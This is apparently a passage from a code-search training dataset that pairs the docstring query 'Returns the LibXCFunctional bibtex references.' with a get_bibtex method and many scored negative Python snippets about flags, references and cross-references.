WAKE_FLAGS.iteritems()}\n\n return ret", "def supported_features(self):\n return SUPPORT_TARGET_TEMPERATURE | SUPPORT_FAN_MODE", "def runtime_enabled_flags(self):\n raise exceptions.NotImplementedError()", "def fan_modes(self) -> list[str]:\n return [FAN_AUTO, FAN_ON]", "def flagged(self) -> Sequence[str]:\r\n return self._flagged", "def support_opset(self) -> Collection[OpsetVersion]:\n return list(self._functions)", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.CHORES, Feature.PROJECTS)", "def enumerate_flags(flag, f_map):\r\n # Reset string based flags to null\r\n f_type = ''\r\n f_flag = ''\r\n # Iterate through flags\r\n for i in f_map:\r\n if i & flag:\r\n if f_map[i] == 'FolderEvent;' or \\\r\n f_map[i] == 'FileEvent;' or \\\r\n f_map[i] == 'SymbolicLink;' or \\\r\n f_map[i] == 'HardLink;':\r\n f_type = ''.join([f_type, f_map[i]])\r\n else:\r\n f_flag = ''.join([f_flag, f_map[i]])\r\n return f_type, f_flag", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.SLACK_TASKS, Feature.PROJECTS)", "def get_parsed_flags():\n return Flags.parsed_args", "def get_user_iflags(self, *args):\n return _ida_hexrays.cfunc_t_get_user_iflags(self, *args)", "def available_functions(self):\n return self.config.keys()", "def available_functions(self):\n return self.target.read_value(self.available_functions_file).splitlines()", "def supported_modes(self):\n return [OFF, SYNC, CHARGE]", "def get_supported_feature_sets(flags) -> List[str]:\n\n # find all supported feature sets\n supported = []\n for one_feature_set in sorted(REQUIRED_FEATURES.keys()):\n if supports_feature_set(flags, one_feature_set):\n supported.append(one_feature_set)\n return supported", "def get_xst_flags(config):\n #print \"Apply slave tags\"\n flags = {}\n user_flags = {}\n if \"xst\" in config.keys():\n if \"flags\" in config[\"xst\"].keys():\n user_flags = config[\"xst\"][\"flags\"]\n\n fn = os.path.join(os.path.dirname(__file__), XST_DEFAULT_FLAG_FILE)\n default_flags = json.load(open(fn, \"r\"))\n for key in default_flags:\n flags[key] = default_flags[key]\n if key in user_flags.keys():\n flags[key][\"value\"] = user_flags[key]\n\n return flags", "def flags(self, query):\n flag_list = []\n\n # add the help flag if it is requested\n if '--help' in query:\n flag_list.append('help')\n query = query.replace('--help', '').replace('-h', '')\n\n return query, flag_list", "def get_flags(args):\r\n\r\n flags = 0\r\n\r\n if args.regexfilepattern is not None:\r\n flags |= pygrep.FILE_REGEX_MATCH\r\n\r\n if not args.regexp:\r\n flags |= pygrep.LITERAL\r\n elif args.dotall:\r\n flags |= pygrep.DOTALL\r\n\r\n if args.ignore_case:\r\n flags |= pygrep.IGNORECASE\r\n\r\n if args.recursive:\r\n flags |= pygrep.RECURSIVE\r\n\r\n if args.regexdirpattern:\r\n flags |= pygrep.DIR_REGEX_MATCH\r\n\r\n return flags", "def __int__(self):\n flags = self._analog_input_mode\n flags = set_bit(flags, 2, self._send_on_sensor_alarm)\n flags = set_bit(flags, 3, self._send_on_input_port_change)\n flags = set_bit(flags, 4, self._enable_1_wire_port)\n flags = set_bit(flags, 5, self._enable_all_link_aliasing)\n flags = set_bit(flags, 6, self._send_on_output_port_change)\n flags = set_bit(flags, 7, self._enable_output_timers)\n return flags", "def features(self):\r\n dict_data = []\r\n my_dict = {\r\n \":IODisc\":\"\",\r\n \"Group\": \"$System\",\r\n \"Comment\": \"\",\r\n \"Logged\": \"No\",\r\n \"EventLogged\": \"No\",\r\n \"EventLoggingPriority\": 0,\r\n \"RetentiveValue\": \"No\",\r\n \"InitialDisc\": \"Off\",\r\n \"OffMsg\": \"\",\r\n \"OnMsg\": \"\",\r\n \"AlarmState\": \"None\",\r\n \"AlarmPri\": 1,\r\n \"DConversion\": \"Direct\",\r\n \"AccessName\": \"HC\",\r\n \"ItemUseTagname\": \"No\",\r\n \"ItemName\": \"\",\r\n \"ReadOnly\": \"No\",\r\n \"AlarmComment\": \"\",\r\n \"AlarmAckModel\": 0,\r\n \"DSCAlarmDisable\": 0,\r\n \"DSCAlarmInhibitor\": \"\",\r\n \"SymbolicName\": \"\"\r\n }\r\n\r\n dict_data.append(my_dict)\r\n\r\n return(my_dict)", "def fact():\n\n result = \"None\"\n\n objc.loadBundle(\n \"IOBluetooth\",\n globals(),\n bundle_path=objc.pathForFramework(\n u\"/System/Library/Frameworks/IOBluetooth.framework\"\n ),\n )\n btprefs = IOBluetoothPreferences.alloc().init()\n result = bool(btprefs.fileTransferServicesEnabled())\n\n return {factoid: result}", "def nodes_flags(self):\n return self._nodes_flags", "def health_checks(self):\n return [self.check_device_connected, self.check_clear_flags]", "def test_flags(self):\n self.check_search(\n dict(flag_contact=u'yes'),\n [u'Tackle', u'DoubleSlap', u'Ice Punch', u'Bite', u'Fly'],\n 'flimsy search by flag',\n )\n\n self.check_search(\n dict(flag_mirror=u'no'),\n [u'Counter', u'Curse', u'Focus Punch', u'Sunny Day'],\n 'better search by flag',\n )\n\n self.check_search(\n dict(flag_contact=u'no', name=u'punch'),\n [],\n 'searching by nega-flag',\n exact=True,\n )", "def SocketFlags(self) -> SocketFlags:", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def gen_flags(self, field):\n if random.random() < 0.5:\n return random.choice(['S', 'A', 'SA', 'PA', 'FA', 'R', 'P', 'F', 'RA', ''])\n else:\n sample = fuzz(self.protocol())\n # Since scapy lazily evaluates fuzzing, we first must set a\n # legitimate value for scapy to evaluate what combination of flags it is\n sample.flags = sample.flags\n return str(sample.flags)", "def getTools(self):\n return [self.toggleEditMode]", "def getFeatures(self, state, action):\n util.raiseNotDefined()", "def getFeatures(self, state, action):\n util.raiseNotDefined()", "def getFeatures(self, state, action):\n util.raiseNotDefined()" ]
[ "0.68110704", "0.66530377", "0.6499626", "0.6473792", "0.64643645", "0.6449167", "0.6381851", "0.6338008", "0.6265147", "0.6250086", "0.6250086", "0.6250086", "0.6250086", "0.62319344", "0.62319344", "0.62319344", "0.62319344", "0.6223301", "0.61941856", "0.61895657", "0.61459684", "0.6107575", "0.6084206", "0.60506064", "0.6038999", "0.60311514", "0.6014956", "0.5896932", "0.5887557", "0.5882827", "0.58682525", "0.58367985", "0.5804343", "0.5783443", "0.5757118", "0.5756025", "0.57498395", "0.57418215", "0.57410496", "0.572027", "0.57183933", "0.56963134", "0.56797564", "0.56760174", "0.564404", "0.56373036", "0.56337583", "0.558968", "0.5538051", "0.5538051", "0.5538051", "0.5538051", "0.55362415", "0.5517928", "0.5490102", "0.54500526", "0.54050136", "0.5394683", "0.53757256", "0.53692514", "0.536082", "0.53526413", "0.5334797", "0.5316201", "0.5304371", "0.5288723", "0.52751464", "0.52383083", "0.52284807", "0.5216154", "0.52158254", "0.52143055", "0.5201437", "0.5197968", "0.517697", "0.5172334", "0.5167235", "0.5164312", "0.51631415", "0.5157121", "0.51359135", "0.51348805", "0.51313114", "0.51212645", "0.51177967", "0.5116337", "0.51113534", "0.5103396", "0.51011914", "0.51002294", "0.5100104", "0.5100085", "0.5100085", "0.5100085", "0.5100085", "0.5100063", "0.509191", "0.5091494", "0.5091494", "0.5091494" ]
0.6317779
8
Returns the LibXCFunctional references.
def get_references(self): return self._refs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def function_refs(self) -> List[FunctionReference]:\n return self._function_refs", "def getXRefsTo(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n # If the current address is function process it\r\n if idc.get_func_flags(self.func_ea) != -1:\r\n # Find all code references to func\r\n ref = idc.get_first_cref_to(self.func_ea)\r\n while ref != idaapi.BADADDR:\r\n # name = get_func_name(ref)\r\n # if not name: name = \"ROM:%08X\" % ref\r\n crefs.append(ref)\r\n ref = idaapi.get_next_cref_to(self.func_ea, ref)\r\n # Find all data references to func\r\n for ref in idautils.DataRefsTo(self.func_ea):\r\n drefs.append(ref)\r\n for ref in idautils.DataRefsTo(self.func_ea + 1):\r\n drefs.append(ref)\r\n\r\n return crefs, drefs", "def list_refs(self):\n pass", "def get_references(caller, callee):\n function_manager = currentProgram.getFunctionManager()\n\n ref_list = []\n callee_symbol = callee.getSymbol()\n callee_references = callee_symbol.getReferences()\n\n for ref in callee_references:\n addr = ref.getFromAddress()\n func = function_manager.getFunctionContaining(addr)\n if func == caller:\n ref_list.append(addr)\n\n return ref_list", "def references(self) -> \"IterableList[Reference]\":\n return Reference.list_items(self)", "def get_refs(func):\n found = re.findall(\"References:(.*)\", func.__doc__, flags=re.DOTALL)\n if any(found):\n ref = \" \".join([s.strip() for s in found[0].split(\"\\n\")]).strip()\n return ref\n else:\n return \"\"", "def getFileReferences():\n refNodes = pm.ls(rf=True)\n fileRefs = [r.referenceFile() for r in refNodes]\n return fileRefs", "def refs(self):\n return self._refs", "def _refs(self, items):\n # type: (Iterable[Any]) -> Iterable[weakref.ReferenceType]\n return map(self.ref, items)", "def functions(self):\n return self.__functions", "def get_all_refobjs(self, ):\n return cmds.ls(type=\"jb_reftrack\")", "def GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def XCAFDoc_ShapeTool_GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def get_fns(self):\n return self.key_to_fn", "def list_defect_refs(self):\n print('-----------\\nDEFECT_REFs\\n-----------')\n self._print_dict(self.defect_refs)", "def get_short_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\txrf2 = get_first_fcref_to( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def getXRefsFrom(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n\r\n\r\n # normalFlow = True\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n\r\n # needed to identify pool variables. drefs accessing the pool may access pointers\r\n # in the pool. the pointers should be retrieved instead\r\n size_pool = self.getSize(withPool=True)\r\n # for each instruction\r\n for i in idautils.FuncItems(self.func_ea):\r\n for xref in idautils.XrefsFrom(i, 0):\r\n # if the xref is to a far or near called function\r\n if xref.type == idc.fl_CN or xref.type == idc.fl_CF:\r\n if xref.to not in crefs:\r\n crefs.append(xref.to)\r\n # if the xref is to a read or write data access\r\n if xref.type == idc.dr_W or xref.type == idc.dr_R:\r\n if xref.to not in drefs:\r\n # if xref.to is in the pool, then retrieve content if it's a pointer\r\n if xref.to < self.func_ea + size_pool:\r\n # those are the references found at the pool location\r\n iteratedOnce = False\r\n for poolRef in idautils.XrefsFrom(xref.to, 0):\r\n if iteratedOnce:\r\n raise(FunctionException(\"%08X: there should only be one data xref in pool variable\"\r\n % (self.func_ea)))\r\n # there should only be one in the pool refernce\r\n if poolRef.to not in drefs:\r\n drefs.append(poolRef.to)\r\n iteratedOnce = True\r\n else:\r\n drefs.append(xref.to)\r\n\r\n # for ref in idautils.DataRefsFrom(self.func_ea):\r\n # drefs.append(ref)\r\n # for ref in idautils.DataRefsFrom(self.func_ea - 1):\r\n # drefs.append(ref)\r\n return crefs, drefs", "def get_short_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\txrf2 = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def list_all_refs(self):\n self.list_refs()\n self.list_ref0s()\n self.list_defect_refs()", "def references(self):\n return tuple(self.__references)", "def fetchReferences(self, dataRef, exposure):\n skyMap = dataRef.get(self.dataPrefix + \"skyMap\", immediate=True)\n tractInfo = skyMap[dataRef.dataId[\"tract\"]]\n patch = tuple(int(v) for v in dataRef.dataId[\"patch\"].split(\",\"))\n patchInfo = tractInfo.getPatchInfo(patch)\n references = lsst.afw.table.SourceCatalog(self.references.schema)\n references.extend(self.references.fetchInPatches(dataRef, patchList=[patchInfo]))\n return references", "def _fc_function_definitions(self) -> str:\n result = 'extern \"C\" {\\n\\n'\n for namespace in self.namespaces:\n for member in namespace.members:\n result += member.fortran_c_wrapper()\n\n result += '}\\n\\n'\n return result", "def test_v1_alert_ref_list_get(self):\n pass", "def list_refs(self):\n print('----\\nREFs\\n----')\n self._print_dict(self.refs)", "def get_references(self):\n return self._references", "def functionals(self):\n return self.__functionals", "def get_refs(*args, **kwargs):\n return get_refs_async(*args, **kwargs).get_result()", "def list_defect_ref_keys(self):\n print('=======')\n print('DEFECT_REFs')\n print('=======')\n for key in self.defect_refs:\n print(key)", "def getRefs(self):\n\n backend = self.backend\n refs = self.moduleRefs\n for ref in refs:\n refPure = ref.rsplit(\":\", 1)[0]\n if refPure in self.seen:\n continue\n\n parts = splitModRef(ref)\n if not parts:\n self.good = False\n continue\n\n parts[2] = prefixSlash(normpath(parts[2])) # the relative bit\n theBackend = (\n None if parts[-1] is None or parts[-1] == backend else parts[-1]\n )\n\n if not self.getModule(*parts[0:-1], backend=theBackend):\n self.good = False", "def __get_references(self):\n named_references = []\n for usage in self.xml_cache.get_xml_tree(\"usagemodel\"):\n variable_usages = usage.findall(\".//namedReference__VariableUsage\")\n for name in variable_usages:\n named_references.append(name.get(\"referenceName\"))\n return named_references", "def get_functions(self):\n\n functions = []\n for scenario in self.scenarios:\n functions.extend(scenario.functions)\n\n return functions", "def find_references(self):\n cls = self.__class__\n nodes = []\n for sobj in self._std.FindDependances(self.get_sobj()):\n nodes.append(cls(self._std, self._bld, sobj.GetID()))\n return nodes", "def get_explorer_toolbox() -> List[Tuple[str, str, str]]:\n explorer_toolbox = list(_explorer_toolbox)\n explorer_toolbox.extend(\n (func_name, title, description)\n for func_name, title, description in _bio2bel_functions\n if _function_is_registered(func_name)\n )\n return explorer_toolbox", "def _get_functions():\n\n # Get all functions that start with _office.\n fcts = {fct_name[len(FCT_PREFIX):]: fct for (fct_name, fct) in\n globals().iteritems() if fct_name.startswith(FCT_PREFIX) and\n hasattr(fct, \"__call__\")}\n\n return fcts", "def get_crossrefs(self):\n return self._crossrefs", "def get_crossrefs(self):\n inter = self.get_interaction()\n crossrefs = {inter: inter.get_crossrefs()}\n crossrefs.update(self._economics.get_crossrefs())\n return crossrefs", "def _deploy_function_refs(self):\n for function_ref in self._spec.function_refs.values():\n logger.info(f\"deploy child function {function_ref.name} ...\")\n function_object = function_ref.function_object\n function_object.metadata.name = function_ref.fullname(self)\n function_object.metadata.project = self.metadata.project\n function_object.metadata.tag = self.metadata.tag\n function_object.spec.graph = self.spec.graph\n # todo: may want to copy parent volumes to child functions\n function_object.apply(mlrun.v3io_cred())\n function_ref.db_uri = function_object._function_uri()\n function_object.verbose = self.verbose\n function_object.spec.secret_sources = self.spec.secret_sources\n function_object.deploy()", "def get_functions():\n\treturn [f for f in globals() if f.startswith('make_')]", "def get_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def get_far_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_fcref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_fcref_from( ea, xrf )\r\n\treturn ret", "def available_functions(self):\n return self.target.read_value(self.available_functions_file).splitlines()", "def get_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def references(self):\n ref_nodes = self.root.xpath(\".//bib-reference\")\n return list(\n itertools.chain.from_iterable(\n self.get_reference_iter(node) for node in ref_nodes\n )\n )", "def links(self):\n inp, out = self.signature\n if self.is_function():\n using = self.function.function\n if not all(inp) or not out:\n return []\n link = core.component_link.ComponentLink(inp, out, using)\n return [link]\n if self.is_helper():\n helper = self.function.helper\n if not all(inp):\n return []\n return helper(*inp)", "def keyrefs(self):\n return [ref(key) for key in self.iterkeys()]", "def support_opset(self) -> Collection[OpsetVersion]:\n return list(self._functions)", "def get_refs(genome_build, aligner, config):\n find_fn = _find_file(config[CONFIG_KEY], startswith=True)\n ref_prefix = sret.find_ref_prefix(genome_build, find_fn)\n return sret.standard_genome_refs(genome_build, aligner, ref_prefix, _list(config[CONFIG_KEY]))", "def match_function(self, tokens):\n items = []\n\n def add_ref(item, unused_start, unused_end, unused_value):\n if isinstance(item, logic.Description):\n items.append(logic.expr(item))\n else:\n items.append(item)\n\n self.cp_parser.reference_callback = add_ref\n self.cp_parser.parse_tokens(tokens, debug=self.debug)\n return items", "def dependencies(self, dep_context):\n if self.strict_deps:\n return self.target.strict_dependencies(dep_context)\n else:\n return list(self.target.closure(bfs=True, **dep_context.target_closure_kwargs))", "def ExtractOperations(toolF):\n return [o[\"uri\"] for o in toolF[\"operation\"]]", "def getReferencesTo(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def fcvs(self): \n return self._link_reg.fcvs", "def functional(self):\n return self.__functional", "def getReferenceAnalyses(self):\n return [analysis for analysis in self.getAnalyses() \\\n if analysis.portal_type=='ReferenceAnalysis']", "def get_fsleyes_deps():\n\n # The dependency list is stored in requirements.txt\n with open(op.join(basedir, 'requirements.txt'), 'rt') as f:\n install_requires = f.readlines()\n\n return [i.strip() for i in install_requires]", "def refmodes(self):\n return self._refmodes", "def list_ref_keys(self):\n print('=======')\n print('REFs')\n print('=======')\n for key in self.refs:\n print(key)", "def functions(self):\n return functions(self.startEA, self.endEA)", "def _get_all_called_funcs(item, context):\n\n # Get all the functions called in the VBA object.\n call_visitor = function_call_visitor()\n item.accept(call_visitor)\n func_names = call_visitor.called_funcs\n\n # Get all of the 0 argument functions called in the VBA object.\n tmp_context = Context(context=context, _locals=context.locals, copy_globals=True)\n _, zero_arg_funcs = _get_var_vals(item, tmp_context)\n func_names.update(zero_arg_funcs)\n \n # Get the definitions for all local functions called.\n local_funcs = []\n for func_name in func_names:\n if (context.contains(func_name)):\n curr_func = context.get(func_name)\n if (isinstance(curr_func, VBA_Object)):\n local_funcs.append(curr_func)\n\n # Done. Return the definitions of all the local functions\n # that were called.\n return local_funcs", "def get_noncall_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\telse:\r\n\t\tif ea not in get_far_crefs_from( xrf ):\r\n\t\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def _get_factories(self):\n return self._factories", "def get_refs(self): \n for row in self._get_references_node():\n yield row.fetch_all_fields()", "def get_allref(self):\n return self.__applicationList.keys()", "def functions(self):\n return [v for v in self.globals.values()\n if isinstance(v, values.Function)]", "def callables(self):\n \n if hasattr(self, \"_callables\"):\n return self._callables\n \n # build a list of all the Callable objects\n # The old backend processed all operations first\n # (FIXME: duplicate for the sake of easy checking)\n self._callables = []\n\n for c in self._node.callables():\n if isinstance(c, idlast.Operation):\n self._callables.append(call.operation(self, c))\n \n for c in self._node.callables():\n if isinstance(c, idlast.Attribute):\n self._callables = self._callables + call.read_attributes(self, c)\n if c.readonly(): continue\n self._callables = self._callables + call.write_attributes(self, c)\n \n return self._callables", "def references(self):\n return self._get_related_resources(False)", "def References(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('references', default)\n return [HEP.ReferenceObject(i) for i in tmp]", "def get_flat_input_refs(self):\n ret = []\n for role_key, role_obj in self.get_recipe_inputs().items():\n for item in role_obj[\"items\"]:\n ret.append(item[\"ref\"])\n return ret", "def external_array_references(self):\n return self._to_ears(self.fileuris)", "def lookup_ops(self):\n return self._lookup_ops", "def get_feature_defs(python_module):\n defs = []\n for fn_name, fn in inspect.getmembers(python_module, inspect.isfunction):\n if hasattr(fn, \"_feature__livefeature__feature_def\"):\n defs.append(fn._feature__livefeature__feature_def)\n\n return defs", "def references(self):\n return self.header('References', '').split()", "def get_dependencies(self, recursive=False):\n dependencies = set()\n for reference in self.references:\n if isinstance(reference.ref_cell, Cell):\n if recursive:\n dependencies.update(reference.ref_cell.get_dependencies(True))\n dependencies.add(reference.ref_cell)\n return dependencies", "def funnels(self):\r\n return resources.Funnels(self)", "def getListOfReferenceGlyphs(self, *args):\n return _libsbml.GeneralGlyph_getListOfReferenceGlyphs(self, *args)", "def autofixDependencies(self, global_ctx):\n pass", "def fortran_functions(self) -> str:\n result = ''\n for member in self.members:\n result += member.fortran_function()\n return result", "def fetch_refspecs(self):\n\n specs = ffi.new('git_strarray *')\n err = C.git_remote_get_fetch_refspecs(specs, self._remote)\n check_error(err)\n\n return strarray_to_strings(specs)", "def reference_types(self):\n return self.references.keys()", "def reference_types(self):\n return self.references.keys()", "def refs_ii(self):\n return self._refs_ii", "def test_reflectance_ref(fluxd, wfb, f_sun, ref):\n\n xsec = 6.648e5 * u.km**2\n\n with vega_fluxd.set({'V': u.Quantity(3.589e-9, 'erg/(s cm2 AA)')}):\n with solar_fluxd.set({wfb: f_sun}):\n r = fluxd.to('1/sr', reflectance(wfb, cross_section=xsec))\n assert r.unit == u.sr**-1\n assert np.isclose(r.value, ref)", "def get_allref(self):\n return self.__filetypeList.keys()", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.SLACK_TASKS, Feature.PROJECTS)", "def fortran_functions(self) -> str:\n result = ''\n if self.public is None:\n return result\n\n result += \"\".join(member.fortran_functions() for member in self.members)\n return result", "def get(self, *args):\n return _libsbml.ListOfFunctionDefinitions_get(self, *args)", "def get_flat_output_refs(self):\n ret = []\n for role_key, role_obj in self.get_recipe_outputs().items():\n for item in role_obj[\"items\"]:\n ret.append(item[\"ref\"])\n return ret", "def RawRefs(self, default=[{}]):\n tmp = self.data.get('raw_refs', default)\n return [HEP.RawReferenceObject(i) for i in tmp]", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.CHORES, Feature.PROJECTS)", "def CodeRefsFrom(ea, flow):\n xref = ida_xref.xrefblk_t()\n if flow == 1:\n yield from xref.crefs_from(ea)\n else:\n yield from xref.fcrefs_from(ea)", "def check_references(swagger: Dict):\n events = set()\n\n ref_jspath = JSPATH_REFERENCES\n\n for _, reference, path in get_elements(swagger, ref_jspath):\n # handle only local references\n if reference.startswith(\"#/\"):\n # decompose reference (error if not possible)\n try:\n rt, obj = reference[2:].split(\"/\")\n except ValueError:\n events.add(\n ReferenceInvalidSyntax(\n path=path, reason=f\"reference {reference} not of the form '#/section/item'\"\n )\n )\n continue\n\n if rt not in REFERENCE_SECTIONS:\n events.add(\n ReferenceInvalidSection(\n path=path,\n reason=f\"Reference {reference} not referring to one of the sections {REFERENCE_SECTIONS}\",\n )\n )\n\n # resolve reference (error if not possible)\n try:\n swagger[rt][obj]\n except KeyError:\n events.add(\n ReferenceNotFoundValidationError(\n path=path, reason=f\"reference '#/{rt}/{obj}' does not exist\"\n )\n )\n\n return events", "def get(self, *args):\n return _libsbml.ListOfSpeciesReferences_get(self, *args)", "def test_getFunctions(self):\n cases = [\n (self.test_eac + \"NE01100.xml\", 4),\n (self.test_eac + \"NE01101.xml\", 8),\n (self.test_eac + \"NE01501.xml\", 0),\n (self.test_eac + \"NE00001.xml\", 0),\n ]\n for case in cases:\n source, expected = case\n doc = EacCpf.EacCpf(source, 'http://www.example.com')\n self.assertNotEqual(doc, None)\n result = doc.getFunctions()\n self.assertNotEqual(result, None)\n self.assertEqual(len(result), expected)", "def founders(self) -> object:\n return self._founders", "def list_reference_images_in_filter(conn,primary_ref,f,log):\n\n log.info('Identifying all current reference image in filter '+str(f))\n\n query = 'SELECT * FROM reference_images WHERE filter=\"'+str(primary_ref[f])+\\\n '\" AND software=\"'+str(primary_ref['software_id'])+\\\n '\" AND facility!=\"'+str(primary_ref['facility_id'])+'\"'\n\n ref_image_list = phot_db.query_to_astropy_table(conn, query, args=())\n\n log.info(repr(ref_image_list))\n\n return ref_image_list", "def get_pyweakrefs(obj: typing.Any) -> list[ReferenceType]:\r\n seq = _reference_id_registry.get(id(obj), [])\r\n return [seq[0] for item in seq]", "def fcv_name_list(self):\n return list(self._link_reg.fcv_names)", "def checkRefs(self, export_refs):\r\n return True", "def get_connector_references(context):\n\n catalog = plone.api.portal.get_tool('portal_catalog')\n query = dict(portal_type='xmldirector.connector')\n items = list()\n for brain in catalog(**query):\n items.append(SimpleTerm(brain.UID, brain.UID, brain.Title))\n items.sort(key=operator.attrgetter(\"title\"))\n return SimpleVocabulary(items)" ]
[ "0.69382197", "0.6387038", "0.6072197", "0.58689415", "0.5774684", "0.57471573", "0.57462764", "0.57416767", "0.5685982", "0.561145", "0.5598167", "0.5594494", "0.55660653", "0.5555497", "0.55140364", "0.55033904", "0.5478641", "0.54763013", "0.5456211", "0.5435863", "0.5416174", "0.5399169", "0.5391509", "0.53781044", "0.53631365", "0.5354028", "0.53507113", "0.53483707", "0.53349346", "0.5334263", "0.5329226", "0.5324943", "0.5303841", "0.52972317", "0.5295265", "0.52922213", "0.52804947", "0.5276527", "0.5251373", "0.52377105", "0.5226639", "0.5220364", "0.5204701", "0.5201124", "0.5181474", "0.5144318", "0.5143494", "0.51279694", "0.51206005", "0.5111458", "0.5108664", "0.5095298", "0.508208", "0.5071141", "0.5070624", "0.5040673", "0.5024185", "0.50236475", "0.50227207", "0.5019682", "0.5006994", "0.5001596", "0.49869597", "0.49758926", "0.49754298", "0.49673468", "0.49650425", "0.49573877", "0.49521962", "0.49512273", "0.4947636", "0.4945971", "0.49459067", "0.49345306", "0.49241155", "0.4914016", "0.49050444", "0.49017143", "0.48838395", "0.48782012", "0.48782012", "0.48768446", "0.48741227", "0.48667023", "0.4832811", "0.48299792", "0.4822731", "0.48227125", "0.48056847", "0.48040435", "0.47876963", "0.4780698", "0.47616705", "0.4756012", "0.47546604", "0.4753492", "0.4749146", "0.47470367", "0.47405127", "0.47374755" ]
0.56396455
9
Returns the LibXCFunctional bibtex references.
def get_bibtex(self): return self._bibtexs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def references(self):\n ref_nodes = self.root.xpath(\".//bib-reference\")\n return list(\n itertools.chain.from_iterable(\n self.get_reference_iter(node) for node in ref_nodes\n )\n )", "def get_refs(func):\n found = re.findall(\"References:(.*)\", func.__doc__, flags=re.DOTALL)\n if any(found):\n ref = \" \".join([s.strip() for s in found[0].split(\"\\n\")]).strip()\n return ref\n else:\n return \"\"", "def get_refs(genome_build, aligner, config):\n find_fn = _find_file(config[CONFIG_KEY], startswith=True)\n ref_prefix = sret.find_ref_prefix(genome_build, find_fn)\n return sret.standard_genome_refs(genome_build, aligner, ref_prefix, _list(config[CONFIG_KEY]))", "def GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def extract_references(text, preprocessor, model):\n has_reference_section, reference_section, non_reference_section = preprocess_reference_text(text)\n reference_text = reference_section if has_reference_section else non_reference_section\n fragment = preprocessor(reference_text)\n out = model(fragment.idx).argmax(dim=2).cpu().numpy()\n\n buffer = ''\n found_citations = []\n in_citation = False\n for char, pred in zip(fragment.text, out[0, :]):\n if pred == 2:\n in_citation = True\n if pred == 3:\n in_citation = False\n if pred in [2, 3]:\n if buffer:\n found_citations.append(buffer)\n buffer = char\n elif pred == 1:\n buffer += char\n elif pred == 0:\n if in_citation:\n buffer += char\n else:\n if buffer:\n found_citations.append(buffer)\n buffer = ''\n return found_citations", "def XCAFDoc_ShapeTool_GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def references(self):\n return self.header('References', '').split()", "def list_refs(self):\n pass", "def get_references(self):\n\n return self._refs", "def find_references(doi):\n if doi is None:\n return None\n\n references = []\n if doi:\n response = 